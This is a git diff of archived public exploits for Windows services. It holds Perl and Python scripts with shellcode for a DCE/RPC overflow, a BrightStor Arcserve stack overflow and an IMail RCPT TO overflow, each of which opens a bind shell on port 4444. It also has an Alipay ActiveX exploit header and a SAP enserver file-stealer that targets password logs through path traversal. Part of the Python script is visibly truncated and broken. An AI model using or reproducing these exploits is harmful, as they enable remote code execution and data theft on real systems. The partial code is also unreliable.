+"\x1e\x2d\xcf\xb9\x6d\x15\xdb\x81\x4b\xc4\x8b\x58\x1e\xdc\xf5\xd5".
+"\x95\x2b\x1c\xfc\xbb\x38\xb1\x7b\xb1\x3e\x89\x2b\xb1\x3e\xb6\x7b".
+"\x1f\xbf\x8b\x87\x39\x6a\x2d\x79\x1f\xb9\x89\xd5\x1f\x58\x1c\xfa".
+"\x6b\x38\x1f\xa9\x24\x0b\x1c\xfc\xb2\x90\x33\x42\x10\xe5\xe7\x75".
+"\xb3\x90\x35\xd5\x30\x6f\xe3\x2a";
+
+
+my $uuid="\x05".							#version
+"\x00".									#version minor
+"\x0b".									#packet bind
+"\x03".									#packet flag
+"\x10\x00\x00\x00".							#data rapresentation
+"\x48\x00".								#fragment length
+"\x00\x00".								#auth length
+"\x01\x00\x00\x00".							#call id
+"\xd0\x16\xd0\x16".				
+"\x00\x00\x00\x00".							#assoc group			
+"\x01\x00\x00\x00\x00\x00\x01\x00".					
+"\xf0\x6b\x24\xdc\x7a\x7a\xce\x11\x9f\x88\x00\x80\x5f\xe4\x38\x38".	#uuid
+"\x01\x00".								#interface ver
+"\x00\x00".								#interface ver minor
+"\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60".	#transfer syntax
+"\x02\x00\x00\x00";							#syntax ver
+
+my $special="\x05".							#version
+"\x00".									#version minor
+"\x00".									#packet type request
+"\x03".									#packet flags
+"\x10\x00\x00\x00".							#data rapresentation
+"\x18\x08".								#frag length
+"\x00\x00".								#auth length
+"\x01\x00\x00\x00".							#call id
+"\x00\x08\x00\x00".							#alloc hint
+"\x00\x00".								#contex id
+"\x2b\x00";								#opnum 43
+
+
+
+
+my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
+$socket or die "Cannot connect to host!\n";
+
+
+$request = $uuid;
+send $socket, $request, 0;
+print "[+] Sent uuid request\n";
+recv($socket, $reply, 1024, 0);
+
+
+$request = $special.("\x90"x680).$jmp.$ret.$uef.$shellcode.("\x90"x1006)."\r\n";
+send $socket, $request, 0;
+print "[+] Sent malicius 1st request\n";
+
+
+$request = $special.("\x90"x680).$jmp.$ret.$uef.$shellcode.("\x90"x1029)."\r\n";
+send $socket, $request, 0;
+print "[+] Sent malicius 2nd request\n";
+
+
+
+print " + Connect on 4444 port of $host ...\n";
+sleep(3);
+system("telnet $host 4444");
+exit;
+
+# milw0rm.com [2007-01-28]
diff --git a/platforms/windows/remote/3244.py b/platforms/windows/remote/3244.py
index 1acb6dc06..c29f4f85c 100755
--- a/platforms/windows/remote/3244.py
+++ b/platforms/windows/remote/3244.py
@@ -1,93 +1,93 @@
-#!/usr/bin/python
-# Remote exploit for the CA BrightStor Arcserve stack overflow as
-# described in http://www.securityfocus.com/archive/1/458648/30/0/threaded
-#
-#
-# Winny Thomas ;-)
-# Author shall bear no responsibility for any screw ups caused by using this code
-#
-
-import os
-import sys
-import socket
-import struct
-
-#Portbind shellcode; Binds shell on TCP port 4444
-shellcode  = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
-shellcode += "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
-shellcode += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
-shellcode += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
-shellcode += "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
-shellcode += "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
-shellcode += "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x58"
-shellcode += "\x4e\x56\x46\x42\x46\x42\x4b\x58\x45\x54\x4e\x53\x4b\x48\x4e\x57"
-shellcode += "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x44\x4a\x51\x4b\x38"
-shellcode += "\x4f\x55\x42\x32\x41\x50\x4b\x4e\x49\x44\x4b\x58\x46\x33\x4b\x58"
-shellcode += "\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c"
-shellcode += "\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
-shellcode += "\x46\x4f\x4b\x53\x46\x35\x46\x52\x4a\x42\x45\x57\x45\x4e\x4b\x48"
-shellcode += "\x4f\x45\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x50\x4b\x54"
-shellcode += "\x4b\x48\x4f\x45\x4e\x41\x41\x30\x4b\x4e\x43\x30\x4e\x32\x4b\x58"
-shellcode += "\x49\x48\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c\x41\x53\x4b\x4d"
-shellcode += "\x46\x56\x4b\x38\x43\x54\x42\x43\x4b\x58\x42\x44\x4e\x30\x4b\x38"
-shellcode += "\x42\x47\x4e\x41\x4d\x4a\x4b\x58\x42\x44\x4a\x30\x50\x55\x4a\x56"
-shellcode += "\x50\x48\x50\x34\x50\x30\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x36"
-shellcode += "\x43\x45\x48\x56\x4a\x46\x43\x53\x44\x33\x4a\x46\x47\x37\x43\x57"
-shellcode += "\x44\x33\x4f\x35\x46\x35\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e"
-shellcode += "\x4e\x4f\x4b\x53\x42\x45\x4f\x4f\x48\x4d\x4f\x35\x49\x38\x45\x4e"
-shellcode += "\x48\x46\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x35\x4c\x36\x44\x30"
-shellcode += "\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x35"
-shellcode += "\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x55\x43\x45\x43\x35\x43\x34"
-shellcode += "\x43\x55\x43\x34\x43\x45\x4f\x4f\x42\x4d\x48\x46\x4a\x36\x41\x41"
-shellcode += "\x4e\x45\x48\x36\x43\x45\x49\x58\x41\x4e\x45\x39\x4a\x56\x46\x4a"
-shellcode += "\x4c\x31\x42\x37\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x31"
-shellcode += "\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42"
-shellcode += "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x35\x4f\x4f\x42\x4d"
-shellcode += "\x4a\x36\x45\x4e\x49\x54\x48\x58\x49\x44\x47\x55\x4f\x4f\x48\x4d"
-shellcode += "\x42\x55\x46\x35\x46\x35\x45\x35\x4f\x4f\x42\x4d\x43\x39\x4a\x56"
-shellcode += "\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x45\x4f\x4f\x48\x4d\x45\x45"
-shellcode += "\x4f\x4f\x42\x4d\x48\x46\x4c\x36\x46\x56\x48\x36\x4a\x46\x43\x46"
-shellcode += "\x4d\x46\x49\x58\x45\x4e\x4c\x56\x42\x35\x49\x55\x49\x52\x4e\x4c"
-shellcode += "\x49\x38\x47\x4e\x4c\x56\x46\x54\x49\x58\x44\x4e\x41\x53\x42\x4c"
-shellcode += "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x34\x4e\x32"
-shellcode += "\x43\x49\x4d\x48\x4c\x47\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36"
-shellcode += "\x44\x47\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x46\x34\x4f\x4f"
-shellcode += "\x48\x4d\x4b\x45\x47\x55\x44\x55\x41\x45\x41\x35\x41\x55\x4c\x36"
-shellcode += "\x41\x30\x41\x35\x41\x55\x45\x45\x41\x45\x4f\x4f\x42\x4d\x4a\x56"
-shellcode += "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x56"
-shellcode += "\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x38\x47\x55\x4e\x4f"
-shellcode += "\x43\x48\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d"
-shellcode += "\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x43\x55\x4f\x4f\x48\x4d"
-shellcode += "\x4f\x4f\x42\x4d\x5a\x90"
-
-def ExploitCA(target):
-       sockAddr = (target, 1900)
-       tsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-       tsock.connect(sockAddr)
-
-       payload = str('0000033000')
-       payload += "\x90" * 2322
-
-       #At the time of overflow EBX points to this location
-       payload += "\x90\x90\xeb\x08" #Jump over return address into shellcode
-       payload += struct.pack("' % sys.argv[0]
-               sys.exit(-1)
-
-       ExploitCA(target)
-       ConnectShell(target)
-
-# milw0rm.com [2007-02-01]
+#!/usr/bin/python
+# Remote exploit for the CA BrightStor Arcserve stack overflow as
+# described in http://www.securityfocus.com/archive/1/458648/30/0/threaded
+#
+#
+# Winny Thomas ;-)
+# Author shall bear no responsibility for any screw ups caused by using this code
+#
+
+import os
+import sys
+import socket
+import struct
+
+#Portbind shellcode; Binds shell on TCP port 4444
+shellcode  = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+shellcode += "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
+shellcode += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
+shellcode += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
+shellcode += "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
+shellcode += "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
+shellcode += "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x58"
+shellcode += "\x4e\x56\x46\x42\x46\x42\x4b\x58\x45\x54\x4e\x53\x4b\x48\x4e\x57"
+shellcode += "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x44\x4a\x51\x4b\x38"
+shellcode += "\x4f\x55\x42\x32\x41\x50\x4b\x4e\x49\x44\x4b\x58\x46\x33\x4b\x58"
+shellcode += "\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c"
+shellcode += "\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
+shellcode += "\x46\x4f\x4b\x53\x46\x35\x46\x52\x4a\x42\x45\x57\x45\x4e\x4b\x48"
+shellcode += "\x4f\x45\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x50\x4b\x54"
+shellcode += "\x4b\x48\x4f\x45\x4e\x41\x41\x30\x4b\x4e\x43\x30\x4e\x32\x4b\x58"
+shellcode += "\x49\x48\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c\x41\x53\x4b\x4d"
+shellcode += "\x46\x56\x4b\x38\x43\x54\x42\x43\x4b\x58\x42\x44\x4e\x30\x4b\x38"
+shellcode += "\x42\x47\x4e\x41\x4d\x4a\x4b\x58\x42\x44\x4a\x30\x50\x55\x4a\x56"
+shellcode += "\x50\x48\x50\x34\x50\x30\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x36"
+shellcode += "\x43\x45\x48\x56\x4a\x46\x43\x53\x44\x33\x4a\x46\x47\x37\x43\x57"
+shellcode += "\x44\x33\x4f\x35\x46\x35\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e"
+shellcode += "\x4e\x4f\x4b\x53\x42\x45\x4f\x4f\x48\x4d\x4f\x35\x49\x38\x45\x4e"
+shellcode += "\x48\x46\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x35\x4c\x36\x44\x30"
+shellcode += "\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x35"
+shellcode += "\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x55\x43\x45\x43\x35\x43\x34"
+shellcode += "\x43\x55\x43\x34\x43\x45\x4f\x4f\x42\x4d\x48\x46\x4a\x36\x41\x41"
+shellcode += "\x4e\x45\x48\x36\x43\x45\x49\x58\x41\x4e\x45\x39\x4a\x56\x46\x4a"
+shellcode += "\x4c\x31\x42\x37\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x31"
+shellcode += "\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42"
+shellcode += "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x35\x4f\x4f\x42\x4d"
+shellcode += "\x4a\x36\x45\x4e\x49\x54\x48\x58\x49\x44\x47\x55\x4f\x4f\x48\x4d"
+shellcode += "\x42\x55\x46\x35\x46\x35\x45\x35\x4f\x4f\x42\x4d\x43\x39\x4a\x56"
+shellcode += "\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x45\x4f\x4f\x48\x4d\x45\x45"
+shellcode += "\x4f\x4f\x42\x4d\x48\x46\x4c\x36\x46\x56\x48\x36\x4a\x46\x43\x46"
+shellcode += "\x4d\x46\x49\x58\x45\x4e\x4c\x56\x42\x35\x49\x55\x49\x52\x4e\x4c"
+shellcode += "\x49\x38\x47\x4e\x4c\x56\x46\x54\x49\x58\x44\x4e\x41\x53\x42\x4c"
+shellcode += "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x34\x4e\x32"
+shellcode += "\x43\x49\x4d\x48\x4c\x47\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36"
+shellcode += "\x44\x47\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x46\x34\x4f\x4f"
+shellcode += "\x48\x4d\x4b\x45\x47\x55\x44\x55\x41\x45\x41\x35\x41\x55\x4c\x36"
+shellcode += "\x41\x30\x41\x35\x41\x55\x45\x45\x41\x45\x4f\x4f\x42\x4d\x4a\x56"
+shellcode += "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x56"
+shellcode += "\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x38\x47\x55\x4e\x4f"
+shellcode += "\x43\x48\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d"
+shellcode += "\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x43\x55\x4f\x4f\x48\x4d"
+shellcode += "\x4f\x4f\x42\x4d\x5a\x90"
+
+def ExploitCA(target):
+       sockAddr = (target, 1900)
+       tsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+       tsock.connect(sockAddr)
+
+       payload = str('0000033000')
+       payload += "\x90" * 2322
+
+       #At the time of overflow EBX points to this location
+       payload += "\x90\x90\xeb\x08" #Jump over return address into shellcode
+       payload += struct.pack("' % sys.argv[0]
+               sys.exit(-1)
+
+       ExploitCA(target)
+       ConnectShell(target)
+
+# milw0rm.com [2007-02-01]
diff --git a/platforms/windows/remote/3264.pl b/platforms/windows/remote/3264.pl
index f3146ab8b..cc8fd449f 100755
--- a/platforms/windows/remote/3264.pl
+++ b/platforms/windows/remote/3264.pl
@@ -1,109 +1,109 @@
-#!/usr/bin/perl
-# http://www.zerodayinitiative.com/advisories/ZDI-06-028.html
-# http://www.securityfocus.com/bid/19885
-# 
-# acaro [at] jervus.it
-
-
-use IO::Socket::INET;
-use Switch;
-
-if (@ARGV < 3) {
-print "--------------------------------------------------------------------\n";
-print "Usage : Imail-rcpt-overflow.pl -hTargetIPAddress -oTargetReturnAddress\n";
-print " Return address: \n";
-print " o1 - IMail 8.12 Version\n";
-print " o2 - IMail 8.10 Versio\n";
-print " Example for IMail 8.12 Version: ./Imail-rcpt-overflow.pl -h127.0.0.1 -o1 \n";
-print "--------------------------------------------------------------------\n";
-}
-
-use IO::Socket::INET;
-
-my $host = 10.0.0.2;
-my $port = 25;
-my $reply;
-my $request;
-my $happystack="\x81\xc4\xff\xef\xff\xff\x44";
-
-
-
-foreach (@ARGV) {
-$host = $1 if ($_=~/-h((.*)\.(.*)\.(.*)\.(.*))/);
-$eip = $1 if ($_=~/-o(.*)/);
-}
-
-switch ($eip) {
-case 1 { $eip="\xc4\x91\x01\x10" } # pop eax ret in SmtpDLL.dll for IMail 8.12
-case 2 { $eip="\xc3\x88\x01\x10" } # pop eax ret in SmtpDLL.dll for IMail 8.10
-}
-
-
-
-# win32_bind -  EXITFUNC=seh LPORT=4444 
-
-my $shellcode  = "\x33\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x93".
-"\x7b\xbd\x36\x83\xee\xfc\xe2\xf4\x6f\x11\x56\x7b\x7b\x82\x42\xc9".
-"\x6c\x1b\x36\x5a\xb7\x5f\x36\x73\xaf\xf0\xc1\x33\xeb\x7a\x52\xbd".
-"\xdc\x63\x36\x69\xb3\x7a\x56\x7f\x18\x4f\x36\x37\x7d\x4a\x7d\xaf".
-"\x3f\xff\x7d\x42\x94\xba\x77\x3b\x92\xb9\x56\xc2\xa8\x2f\x99\x1e".
-"\xe6\x9e\x36\x69\xb7\x7a\x56\x50\x18\x77\xf6\xbd\xcc\x67\xbc\xdd".
-"\x90\x57\x36\xbf\xff\x5f\xa1\x57\x50\x4a\x66\x52\x18\x38\x8d\xbd".
-"\xd3\x77\x36\x46\x8f\xd6\x36\x76\x9b\x25\xd5\xb8\xdd\x75\x51\x66".
-"\x6c\xad\xdb\x65\xf5\x13\x8e\x04\xfb\x0c\xce\x04\xcc\x2f\x42\xe6".
-"\xfb\xb0\x50\xca\xa8\x2b\x42\xe0\xcc\xf2\x58\x50\x12\x96\xb5\x34".
-"\xc6\x11\xbf\xc9\x43\x13\x64\x3f\x66\xd6\xea\xc9\x45\x28\xee\x65".
-"\xc0\x28\xfe\x65\xd0\x28\x42\xe6\xf5\x13\xac\x6a\xf5\x28\x34\xd7".
-"\x06\x13\x19\x2c\xe3\xbc\xea\xc9\x45\x11\xad\x67\xc6\x84\x6d\x5e".
-"\x37\xd6\x93\xdf\xc4\x84\x6b\x65\xc6\x84\x6d\x5e\x76\x32\x3b\x7f".
-"\xc4\x84\x6b\x66\xc7\x2f\xe8\xc9\x43\xe8\xd5\xd1\xea\xbd\xc4\x61".
-"\x6c\xad\xe8\xc9\x43\x1d\xd7\x52\xf5\x13\xde\x5b\x1a\x9e\xd7\x66".
-"\xca\x52\x71\xbf\x74\x11\xf9\xbf\x71\x4a\x7d\xc5\x39\x85\xff\x1b".
-"\x6d\x39\x91\xa5\x1e\x01\x85\x9d\x38\xd0\xd5\x44\x6d\xc8\xab\xc9".
-"\xe6\x3f\x42\xe0\xc8\x2c\xef\x67\xc2\x2a\xd7\x37\xc2\x2a\xe8\x67".
-"\x6c\xab\xd5\x9b\x4a\x7e\x73\x65\x6c\xad\xd7\xc9\x6c\x4c\x42\xe6".
-"\x18\x2c\x41\xb5\x57\x1f\x42\xe0\xc1\x84\x6d\x5e\x63\xf1\xb9\x69".
-"\xc0\x84\x6b\xc9\x43\x7b\xbd\x36";
-
-
-my $nop="\x41"x137;
-
-my $buffer = "RCPT TO:"."\x20\x3c\x40".$eip . "\x3a" .$nop.$happystack.$shellcode."\x4a\x61\x63\x3e"."\n";
-
-
-my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
-$socket or die "Cannot connect to host!\n";
-
-recv($socket, $reply, 1024, 0);
-print "Response:" . $reply;
-
-
-$request = "EHLO " . "\r\n";
-send $socket, $request, 0;
-print "[+] Sent  EHLO\n";
-recv($socket, $reply, 1024, 0);
-print "Response:" . $reply;
-
-
-$request = "MAIL FROM:" . "\x20" . "\x3c"."acaro". "\x40"."jervus.it" . "\x3e" . "\r\n";
-send $socket, $request, 0;
-print "[+] Sent  MAIL FROM\n";
-recv($socket, $reply, 1024, 0);
-print "Response:" . $reply;
-
-
-
-
-$request = $buffer;
-send $socket, $request, 0;
-print "[+] Sent malicius request\n";
-close $socket;
-
-
-
-print " + connect on port 4444 of $host ...\n";
-sleep(3);
-system("telnet $host 4444");
-exit;
-
-# milw0rm.com [2007-02-04]
+#!/usr/bin/perl
+# http://www.zerodayinitiative.com/advisories/ZDI-06-028.html
+# http://www.securityfocus.com/bid/19885
+# 
+# acaro [at] jervus.it
+
+
+use IO::Socket::INET;
+use Switch;
+
+if (@ARGV < 3) {
+print "--------------------------------------------------------------------\n";
+print "Usage : Imail-rcpt-overflow.pl -hTargetIPAddress -oTargetReturnAddress\n";
+print " Return address: \n";
+print " o1 - IMail 8.12 Version\n";
+print " o2 - IMail 8.10 Versio\n";
+print " Example for IMail 8.12 Version: ./Imail-rcpt-overflow.pl -h127.0.0.1 -o1 \n";
+print "--------------------------------------------------------------------\n";
+}
+
+use IO::Socket::INET;
+
+my $host = 10.0.0.2;
+my $port = 25;
+my $reply;
+my $request;
+my $happystack="\x81\xc4\xff\xef\xff\xff\x44";
+
+
+
+foreach (@ARGV) {
+$host = $1 if ($_=~/-h((.*)\.(.*)\.(.*)\.(.*))/);
+$eip = $1 if ($_=~/-o(.*)/);
+}
+
+switch ($eip) {
+case 1 { $eip="\xc4\x91\x01\x10" } # pop eax ret in SmtpDLL.dll for IMail 8.12
+case 2 { $eip="\xc3\x88\x01\x10" } # pop eax ret in SmtpDLL.dll for IMail 8.10
+}
+
+
+
+# win32_bind -  EXITFUNC=seh LPORT=4444 
+
+my $shellcode  = "\x33\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x93".
+"\x7b\xbd\x36\x83\xee\xfc\xe2\xf4\x6f\x11\x56\x7b\x7b\x82\x42\xc9".
+"\x6c\x1b\x36\x5a\xb7\x5f\x36\x73\xaf\xf0\xc1\x33\xeb\x7a\x52\xbd".
+"\xdc\x63\x36\x69\xb3\x7a\x56\x7f\x18\x4f\x36\x37\x7d\x4a\x7d\xaf".
+"\x3f\xff\x7d\x42\x94\xba\x77\x3b\x92\xb9\x56\xc2\xa8\x2f\x99\x1e".
+"\xe6\x9e\x36\x69\xb7\x7a\x56\x50\x18\x77\xf6\xbd\xcc\x67\xbc\xdd".
+"\x90\x57\x36\xbf\xff\x5f\xa1\x57\x50\x4a\x66\x52\x18\x38\x8d\xbd".
+"\xd3\x77\x36\x46\x8f\xd6\x36\x76\x9b\x25\xd5\xb8\xdd\x75\x51\x66".
+"\x6c\xad\xdb\x65\xf5\x13\x8e\x04\xfb\x0c\xce\x04\xcc\x2f\x42\xe6".
+"\xfb\xb0\x50\xca\xa8\x2b\x42\xe0\xcc\xf2\x58\x50\x12\x96\xb5\x34".
+"\xc6\x11\xbf\xc9\x43\x13\x64\x3f\x66\xd6\xea\xc9\x45\x28\xee\x65".
+"\xc0\x28\xfe\x65\xd0\x28\x42\xe6\xf5\x13\xac\x6a\xf5\x28\x34\xd7".
+"\x06\x13\x19\x2c\xe3\xbc\xea\xc9\x45\x11\xad\x67\xc6\x84\x6d\x5e".
+"\x37\xd6\x93\xdf\xc4\x84\x6b\x65\xc6\x84\x6d\x5e\x76\x32\x3b\x7f".
+"\xc4\x84\x6b\x66\xc7\x2f\xe8\xc9\x43\xe8\xd5\xd1\xea\xbd\xc4\x61".
+"\x6c\xad\xe8\xc9\x43\x1d\xd7\x52\xf5\x13\xde\x5b\x1a\x9e\xd7\x66".
+"\xca\x52\x71\xbf\x74\x11\xf9\xbf\x71\x4a\x7d\xc5\x39\x85\xff\x1b".
+"\x6d\x39\x91\xa5\x1e\x01\x85\x9d\x38\xd0\xd5\x44\x6d\xc8\xab\xc9".
+"\xe6\x3f\x42\xe0\xc8\x2c\xef\x67\xc2\x2a\xd7\x37\xc2\x2a\xe8\x67".
+"\x6c\xab\xd5\x9b\x4a\x7e\x73\x65\x6c\xad\xd7\xc9\x6c\x4c\x42\xe6".
+"\x18\x2c\x41\xb5\x57\x1f\x42\xe0\xc1\x84\x6d\x5e\x63\xf1\xb9\x69".
+"\xc0\x84\x6b\xc9\x43\x7b\xbd\x36";
+
+
+my $nop="\x41"x137;
+
+my $buffer = "RCPT TO:"."\x20\x3c\x40".$eip . "\x3a" .$nop.$happystack.$shellcode."\x4a\x61\x63\x3e"."\n";
+
+
+my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
+$socket or die "Cannot connect to host!\n";
+
+recv($socket, $reply, 1024, 0);
+print "Response:" . $reply;
+
+
+$request = "EHLO " . "\r\n";
+send $socket, $request, 0;
+print "[+] Sent  EHLO\n";
+recv($socket, $reply, 1024, 0);
+print "Response:" . $reply;
+
+
+$request = "MAIL FROM:" . "\x20" . "\x3c"."acaro". "\x40"."jervus.it" . "\x3e" . "\r\n";
+send $socket, $request, 0;
+print "[+] Sent  MAIL FROM\n";
+recv($socket, $reply, 1024, 0);
+print "Response:" . $reply;
+
+
+
+
+$request = $buffer;
+send $socket, $request, 0;
+print "[+] Sent malicius request\n";
+close $socket;
+
+
+
+print " + connect on port 4444 of $host ...\n";
+sleep(3);
+system("telnet $host 4444");
+exit;
+
+# milw0rm.com [2007-02-04]
diff --git a/platforms/windows/remote/3279.html b/platforms/windows/remote/3279.html
index cfb69c805..b199ce4e6 100755
--- a/platforms/windows/remote/3279.html
+++ b/platforms/windows/remote/3279.html
@@ -1,57 +1,57 @@
-/************************************************************************************************
-Alipay ActiveX Remote Code Execute Exploit,enjoy it:)
-by cocoruder(frankruder_at_hotmail.com)
-http://ruder.cdut.net
-*************************************************************************************************/
-
-
-
-
-
-
-
-
-
-
-
-
-# milw0rm.com [2007-02-06]
+/************************************************************************************************
+Alipay ActiveX Remote Code Execute Exploit,enjoy it:)
+by cocoruder(frankruder_at_hotmail.com)
+http://ruder.cdut.net
+*************************************************************************************************/
+
+
+
+
+
+
+
+
+
+
+
+
+# milw0rm.com [2007-02-06]
diff --git a/platforms/windows/remote/3291.pl b/platforms/windows/remote/3291.pl
index fee55f2da..b26c40e7b 100755
--- a/platforms/windows/remote/3291.pl
+++ b/platforms/windows/remote/3291.pl
@@ -1,105 +1,105 @@
-#!/usr/bin/perl -w
-
-##
-## SAP 'enserver.exe' file downloader
-## Tested on "SAP Web Application Server Java 6.40" (eval DVD)
-## Found & coded by Nicob
-##
-## The downloaded file is limited to the first 32 kilobytes
-## Usual port : TCP/3200+SYSNR
-## Exemple : ./r3-stealer-1.0.pl 192.168.2.22 3201 "c:\\boot.ini"
-##
-## From MSDN (Win2K pre-SP4, WinXP pre-SP2 and WinNT) :
-## "\\\\your_box\\pipe\\your_pipe" => get Local Admin (SAPServiceJ2E)
-## http://msdn.microsoft.com/library/default.asp?url=/library/en-us/secauthz/security/authorization_constants.asp
-##
-## File parameter :
-##	C:\boot.ini
-## 	\\10.11.12.13\share\image.jpg
-##	..\..\..\..\..\..\Documents and Settings\All Users\Application Data\sapdb\wa\httpreq.log (contains passwords !)
-##
-
-# Init
-
-use strict;
-use IO::Socket;
-
-my $verbose = 0;
-# Set this to anything not null to crash the process
-my $crash = "";
-
-my $socket;
-my $reply;
-
-$|=1;
-
-# Get arguments
-
-if (($#ARGV<2) or ($ARGV[0] eq "-h")) {die "Usage: $0    ()\n";}
-my $host=$ARGV[0]; 
-my $port=$ARGV[1]; 
-my $filename=$ARGV[2]; 
-my $output=$ARGV[3]; 
-
-# Calculate variables
-
-my $lg = length($filename);
-my $tag1 = sprintf('%x', 0x4F + $lg);
-my $tag2 = sprintf('%x', 0x20 + $lg);
-
-# Show banner
-
-print "#####################################################################\n";
-print "### SAP 'enserver.exe' file downloader\n";
-print "### Downloading '$filename' from '$host'\n";
-print "#####################################################################\n\n";
-
-# Define the packets
-
-my $packet1 =
-	"0000005dabcde123000000000000005d0000005d06010000000000060000000000040000000000010004000000000003".	# Static
-	"5f6e69636f625f6e69636f625f6e69636f62315f".								# ASCII string : "_nicob_nicob_nicob1_" 
-	"00000000020000003b0000000500000002000000060000000400000001";						# Static
-
-my $packet2 =
-	"000000". $tag1. "abcde12300000001000000". $tag1 ."000000". $tag1 .
-	"03000000454e430001010000234541410100000013030000000000234541450001000000". $tag2 .
-	"0000000000007d00000000000000000000000000". unpack("H*",$filename) . $crash ."000023454144";		# Crash if bad filename length
-
-# Create the socket
-
-$socket = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$host,PeerPort => $port)
-		|| die "Connection refused at [$host:$port]";
-
-# Send the two packet
-
-print $socket pack("H*",$packet1);
-print $socket pack("H*",$packet2);
-
-sleep 2;
-
-# Read and display response
-
-recv($socket,$reply,150000,MSG_PEEK);
-if ($reply =~ /^(.*)#EAD(.*)$/s) {
-	print "File received !\n";
-	if ((!defined($output)) or ($output eq "")) {
-		print "\n===========================================\n";
-		print $2;
-		print "\n===========================================\n";
-	} else {
-		open(OUT, "> $output") || die "Can't open $output ($0)";
-		print "File saved as '$output'\n";
-		print OUT $2;
-		close(OUT);
-	}
-} else {
-	print "Problem interpreting reply :-(\n";
-}
-
-# Close the socket
-
-print "\nThe end ...\n";
-close $socket;
-
-# milw0rm.com [2007-02-08]
